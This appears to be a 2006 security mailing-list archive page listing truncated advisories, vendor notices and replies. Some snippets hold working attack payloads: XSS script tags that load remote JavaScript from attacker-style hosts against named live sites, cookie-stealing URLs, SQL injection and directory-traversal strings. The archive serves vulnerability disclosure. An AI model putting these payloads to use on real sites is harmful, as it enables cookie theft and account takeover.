DCP-Portal 6.1.x, Remote command execution

2006-06-12 Thread Federico Fazzi
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Advisory id: FSA:013 Author:Federico Fazzi Date: 12/06/2006, 9:31 Sinthesis: DCP-Portal 6.1.x, Remote command execution Type: high Product: http://www.dcp-portal.org/ Patch: u

Content-Builder (CMS) 0.7.5, Remote command execution

2006-06-12 Thread Federico Fazzi
- Advisory id: FSA:012 Author:Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: Content-Builder (CMS) 0.7.5, Remote command execution Type: high Product: http://www.content-builder.de/ Patch: unavailable --

Emllabs.com - XSS

2006-06-12 Thread luny
Emllabs.com Effected files: articles.php search input box. The search input box doesnt properally filter user input. for PoC try putting in: [SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] XSS Vulnerability: http://previous.emllabs.com/articles.php?navCur=[SCRIPT%20SRC=http://evils

Call For Papers - No cON Name 2006 Edition Spain

2006-06-12 Thread Jose Nicolas Castellano
Hello, This is for you... Thanks for reading... * * No cON Name 2006 Congress === Call For Papers * * <> http://www.noconname.org/congreso2006.php<> <> September: 28th, 29th and 30th.

[FSA013] phpCMS 1.2.1pl2, Remote command execution

2006-06-12 Thread Federico Fazzi
- Advisory id: FSA:014 Author:Federico Fazzi Date: 12/06/2006, 10:25 Sinthesis: phpCMS 1.2.1pl2, Remote command execution Type: high Product: http://www.phpcms.de/ Patch: unavailable ---

internet explorer vulnerability based on MarjinZ & Mr.Niega discovered

2006-06-12 Thread Kevin Berkane
Internet Explorer Crash [Proof of concept] based on MarjinZ & Mr.Niega discovered Affected Software: Internet explorer Severity: Unknown Impact: Crash E-Mail: [EMAIL PROTECTED]

Re: Internet Explorer vulnerbility

2006-06-12 Thread Michael N. Telnov
IE ver. 6.0.2900.2180.xpsp_sp2_rtm.040803-2158 not affected - Original Message - From: <[EMAIL PROTECTED]> To: Sent: Thursday, June 08, 2006 11:00 PM Subject: Internet Explorer vulnerbility /* * * Internet Explorer Crash [Proof of concept] * Bug discovered by MarjinZ & Mr.Niega * ht

Invision Power Board XSS

2006-06-12 Thread kepche
*//Product :Invision Power Board *//Version :2.1.6 and prior versions must be affected. *//XSS= http://localhost/forum/admin.php?phpinfo=alert() *//You can steal only admins cookie. *//www.spymastersnake.org *//[EMAIL PROTECTED]

Re: Windows XP Task Scheduler Local Privilege Escalation (Advisory)

2006-06-12 Thread Eliah Kagan
From the article: "Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it's limited to Administrator accounts." But it's limited to members of the Administrators group by default. Anyone who is an administrator can make their system

Re: Ie opera dos exploit

2006-06-12 Thread Daniel Hoffmann
I got > 88% if i use your PoC. But if i press the close-button of this tab, the 'DoS' stop to work. ;) Opera 8.52 OS: NetBSD-current

Yourfacesucks.com - XSS & cookie disclosure

2006-06-12 Thread luny
Yourfacesucks.com Homepage: http://www.yourfacesucks.com Effected files: music/video input boxes in editing profile subject box of sending a PM thread.php --- XSS Vuln with cookie disclosure in profile input boxes: No filter evasion needed here. Fo

Re: SSL VPNs and security

2006-06-12 Thread E Mintz
I agree on your point that the technology requires PROPER design. Vendors who miss the basics should lose their right to play the game. On 6/9/06, Michal Zalewski <[EMAIL PROTECTED]> wrote: On Fri, 9 Jun 2006, E Mintz wrote: > How about some real-world, application specific exploits? There's

Re: Internet Explorer vulnerbility

2006-06-12 Thread Andrei Ponomarev
[EMAIL PROTECTED]: /* * * Internet Explorer Crash [Proof of concept] * Bug discovered by MarjinZ & Mr.Niega * http://www.swerat.com/ * * Affected Software: Internet explorer * Severity: Unknown * Impact: Crash * Solution Status: Unpatched * * E-Mail: [EMAIL PROTECTED] & [EMAIL PROTECTED] * __

[EEYEB-20060524] Symantec Remote Management Stack Buffer Overflow

2006-06-12 Thread eEye Advisories
Symantec Remote Management Stack Buffer Overflow Release Date: June 12, 2006 Date Reported: May 24, 2006 Severity: High (Remote Code Execution) Systems Affected: Symantec AntiVirus 10.0.x for Windows (all versions) Symantec AntiVirus 10.1.x for Windows (all versions) Symantec Client Security 3.

Meefo.com - XSS with cookie include

2006-06-12 Thread luny
Meefo.com Homepage: http://meefo.com Effected files: reading profiles index.php input boxes onprofiles sending private msgs -- Reading aprofile and with cookie include PoC: Since data isn't properlly filtered (backslashes are added to ' and "), a user can

[ GLSA 200606-09 ] SpamAssassin: Execution of arbitrary code

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

# MHG Security Team --- PHORUM 5.1.13 Remote File Inc.

2006-06-12 Thread erne
# Milli-Harekat Advisory ( www.milli-harekat.org ) # PHORUM <= 5.1.13 - Remote File Include Vulnerabilities # Risk : High # Class: Remote # Script : PHORUM 5.1.13 # Credits : ERNE # Thanks : Dj_Remix,The_Bekir,Liz0zim,Eskobar,SpC-x,3n7r1k4 and ALL MHG USERS # Vulnerable : http://www

Vampirefreaks.com - XSS with cookie disclosure

2006-06-12 Thread luny
Vampirefreaks.com Homepage: http://www.vampirefreaks.com Effected files: input boxes of editing your profile posting a journal entry. Commenting XSS Vulnerability: Data isn't properly filtered when editing your profile. One way to bypass the filter is to escape quotes and useclosing b

Re: SSL VPNs and security

2006-06-12 Thread thanekamp
At least in terms of Cisco, you are confusing SSL VPN and Web VPN. They are not interoperable and offer different levels of security.

RE: Internet Explorer vulnerbility

2006-06-12 Thread Greg Merideth (Forward Technology)
IE7 Beta 2 build [7.0.5346.5] parses without crashing. Greg Merideth Forward Technology, LLC. CTO & Other Wild Stuff [EMAIL PROTECTED] PGP Fingerprint 18C3CE191171736225D62C3829F7B18A00F2AC0C -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Thursday, June 08, 20

Re: SSL VPNs and security

2006-06-12 Thread wnorth
Very good information, we use F5 firepass products and I could see the same issue inherinet in your statements. The benefits to the business, from a cost perspective, are many, no need for tokens unless you are doing 2-factor auth, which I encourage as it will check your personal PIN against you

[ MDKSA-2006:099 ] - Updated freetype2 packages fixes multiple vulnerabilities.

2006-06-12 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:099 http://www.mandriva.com/security/ ___

rPSA-2006-0100-1 freetype

2006-06-12 Thread Justin M. Forbes
rPath Security Advisory: 2006-0100-1 Published: 2006-06-12 Products: rPath Linux 1 Rating: Major Exposure Level Classification: User Non-deterministic Weakness Updated Versions: freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-2.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?n

Virtualtourist.com - XSS with cookie disclosure

2006-06-12 Thread luny
Virtualtourist.com Homepage: http://www.virtualtourist.com Effected files: Input boxes of your profile search destination input box --- XSS vulnerability with cookie disclosure: Under the section of "Tell others a little about yourse

[ GLSA 200606-14 ] GDM: Privilege escalation

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

Re: igloo DoubleSpeak v 0.1 Multiple remote file inclusion

2006-06-12 Thread str0ke
[EMAIL PROTECTED], require "config.inc"; contains 'private' => '/www/mrpenguin.org/devel/private', So this shouldn't be vulnerable. Missing something? /str0ke On 11 Jun 2006 20:47:48 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: igloo DoubleSpeak v 0.1 Multiple remote file inclusion

Onlinenode.com - XSS

2006-06-12 Thread luny
Onlinenode.com Homepage: http://www.onlinenode.com Effected files: node_category.php node_article.php webpage.php guestbook.php journal.php pictures.php chatroom.php --- XSS Vuln via node_category.php: One way to archive this is to use black tags with an op

Stargazer.org - XSS with Session output

2006-06-12 Thread luny
Stargazer.org Homepage: http://www.stargazer.org Effected files: login box registration boxes creating a survey --- Login box & registration XSS Vuln: for proof of concept just try adding: '';!--"=&{()}http://youfucktard.com/xss.js>'';!--"=&{()

Windows XP Task Scheduler Local Privilege Escalation (Advisory)

2006-06-12 Thread zipk0der
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = Advisory: Windows XP Task Scheduler Local Privilege Escalation = = Author: Daniel Hückmann (zipk0der) [EMAIL PROTECTED] = = Released at: http://www.pandora-security.com = =-=-

ThWboard 3.0 <= SQL Injection

2006-06-12 Thread 666
// ThWboard 3.0 <= SQL Injection // - [~] Advisory by: SR-Crew [-] Exploit: http://www.example.com/showtopic.php?threadid=1&pagenum=[SQL] [-] Googledork: - [+] Greetz to: BlueGeek.de [+] Visit: www.SR-Crew.de.tt

cescripts.com - XSS

2006-06-12 Thread luny
Cescripts.com Scripts Below are scripts I tested from the site cescripts.com. This site seels to be selling canned scripts, full of errors. Anyways, take a look: Car Classifieds Homepage: http://www.cescripts.com/ effected files: index.php XSS Vulnerabilities PoC: Viewing a car: htt

Wireclub.com - XSS & cookie disclosure

2006-06-12 Thread luny
Wireclub.com Homepage: http://www.wireclub.com Effected files: input boxes of editing a profile XSS Vuln with no filter evasion at all: We notice that when trying to put a url in the Open line about yourself input box, we get the msg "no urls allowed" as well as "the field cannot cont

Nowtalking.com - XSS

2006-06-12 Thread luny
Nowtalking.com Homepage: http://www.nowtalking.com Effected files: input boxes of logging in and searching friends-new.asp gallery.asp friends.asp gb.asp JET DB error due to injection: Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'UserNam

sorry i wrong something, this is original AWF CMS 1.11 adv

2006-06-12 Thread Federico Fazzi
this is ok: - Advisory id: FSA:011 Author:Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: AWF CMS 1.11, Remote command execution Type: high Product: http://www.awf-cms.org/ Patch: unavailable ---

Foing (manage_songs.php) Remote File Inclusion[phpBB]

2006-06-12 Thread darkfire
# Foing (manage_songs.php) Remote File Inclusion[phpBB] # # Contact : email: [EMAIL PROTECTED] & msn: [EMAIL PROTECTED] # Risk : High # Class : Remote # Script : Foing # Version : 0.7.0 e previous - Vulnerable code : i

Opengaia.com - XSS Vuln & Session Include

2006-06-12 Thread luny
Opengaia.com Homepage: http://www.opengaia.com Effected files: my_page.php module.php editing your profile the search input box adding a diary/blog Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the same.

[KAPDA::48]CopperminePhotoGallery1.4.8~ addhit() function~ SQLinjection attack

2006-06-12 Thread addmimistrator
[ORIGINAL ADVISORY:] http://myimei.com/security/2006-06-11/copperminephotogallery148-addhit-function-sqlinjection-attack.html HTTP://KAPDA.IR ——-Summary——- Software: CPG Coppermine Photo Gallery Software’s Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.8.stable Class: Remote S

PaintedOver.com, Inc. 2004-2006 Xss Vulnerabilities

2006-06-12 Thread redl_ine
PaintedOver.com, Inc. 2004-2006 Hosted images © their respective owners /show.php Xss Vulnerabilities Software: PaintedOver.com, Inc. 2004-2006 Hosted images © their respective owners Version: All Type: Cross site scripting Date: 11\06\2006 17:00 Credit: redLine Example: http://

Wanderlist.com - XSS vuln with sessions disclosure

2006-06-12 Thread luny
Wanderlist.com Homepage: http://www.wanderlist.com search.cgi Search box input adding a item to a list Search.cgi XSS vuln with sessions disclosure: By putting a few ending opening tags with quotes beforeand after,we are able create a XSS example: ">">">'http://youfucktard.com/xss.js

Myscrapbook v3.1 - XSS

2006-06-12 Thread luny
Myscrapbook Homepage: http://www.pixytrix.com/myscrapbook/ Effected files: singlepage.php --- Full path error with viewing most files in the txt-db-api dir: Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or directory in /

tempnam() Bypass unique file name PHP 5.1.4

2006-06-12 Thread cxib
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [tempnam() Bypass unique file name PHP 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 22.5.2006 - -Public: 11.6.2006 from SECURITYREASON.COM CVE-2006-2660 - --- 0.Description --- PHP is an HTML-embedded scripting languag

CS-Forum <= 0.81 Cross Site Scripting, SQL Injection, Full Path Disclosure

2006-06-12 Thread gmdarkfig
Cross Site Scripting http://[...]/read.php?msg_result=[XSS] http://[...]/read.php?rep_titre=";>[XSS] Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS] SQL Injection * http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT] http://[..

RCblog 1.03 Directory Traversal [index.php]

2006-06-12 Thread irc0d3r
RCblog 1.03 website : www.fluffington.com discovered by : Hessam-x www.Hessamx.net --[ Directory Traversal] script : "index.php" /rcblog/index.php?post=../a_file%00

WinSCP - URI Handler Command Switch Parsing

2006-06-12 Thread Jelmer Kuperus
WinSCP - URI Handler Command Switch Parsing About winscp : WinSCP is an open source freeware SFTP client for Windows using SSH. Legacy SCP protocol is also supported. Its main function is safe copying of files between a local and a remote computer. Versions affected : It was tested on WinSCP 3.

vbulletin.com Multiple XSS Vulnerabilities

2006-06-12 Thread chris
Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the attacker to gain sensitive credentials for authentication himself as a user on the forum and site. The first problem lies in the the site's Sales Form for opening an issue ticket. Proper sanitation of variables passe

Re: iFoto v0.20-06/06/06

2006-06-12 Thread aizu . ikmal
XSS vulnerability fixed in version 0.50. Please download the latest version at http://ifoto.ireans.com Thank you. ... Aizu

Hotbot.com - XSS vulnerability in search engine

2006-06-12 Thread admin
Hotbot.com - XSS vulnerability -- Type: Cross site scripting Date: June, 10th 2006 -- Credits: -- Discovered by: David "Aesthetico" Vieira-Kurz http://www.m

Lycos.com - XSS vulnerability

2006-06-12 Thread admin
Lycos.com - XSS vulnerability -- Type: Cross site scripting Date: June, 10th 2006 -- Credits: -- Discovered by: David "Aesthetico" Vieira-Kurz http://www.ma

Secunia Research: MyBB "domecode()" PHP Code Execution Vulnerability

2006-06-12 Thread Secunia Research
== Secunia Research 12/06/2006 - MyBB "domecode()" PHP Code Execution Vulnerability - == Table of Contents Affected Software.

5 Star Review - review-script.com - XSS w/ cookie output

2006-06-12 Thread luny
5 Star Review Script Homepage: http://www.review-script.com/ Effected files: index2.php report.php search box editing your profile posting a review. -- index2.php XSS Vuln with cookie disclosure: By ending quotes and using a few closing and opening tag

[ GLSA 200606-13 ] MySQL: SQL Injection

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[ GLSA 200606-12 ] Mozilla Firefox: Multiple vulnerabilities

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

[ GLSA 200606-11 ] JPEG library: Denial of Service

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -

Diaryland.com - XSS

2006-06-12 Thread luny
Diaryland.com Homepage: http://www.diaryland.com Effected files: input boxes on creating diary entries. posting comments in diary entries XSS Vuln PoC: With no filter evasion at all, we simply put as our entry: [SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT] Screenshots: http://

Mydeardiary.com - XSS

2006-06-12 Thread luny
Mydeardiary.com Homepage: http://www.mydeardiary.com Effected files: search input boxes Adding new diary entries -- We create our XSS example by ending quotes with tags before and after: ">">">'>http://youfucktard.com/xss.js><"<"<"<"<" Screensho

igloo DoubleSpeak v 0.1 Multiple remote file inclusion

2006-06-12 Thread aminrayden
igloo DoubleSpeak v 0.1 Multiple remote file inclusion - Aria-security.com advisory Bug Discovered by [EMAIL PROTECTED] (amin emami) Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt email:[EMAIL PROTECTED] Date:1

[ GLSA 200606-10 ] Cscope: Many buffer overflows

2006-06-12 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200606-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - -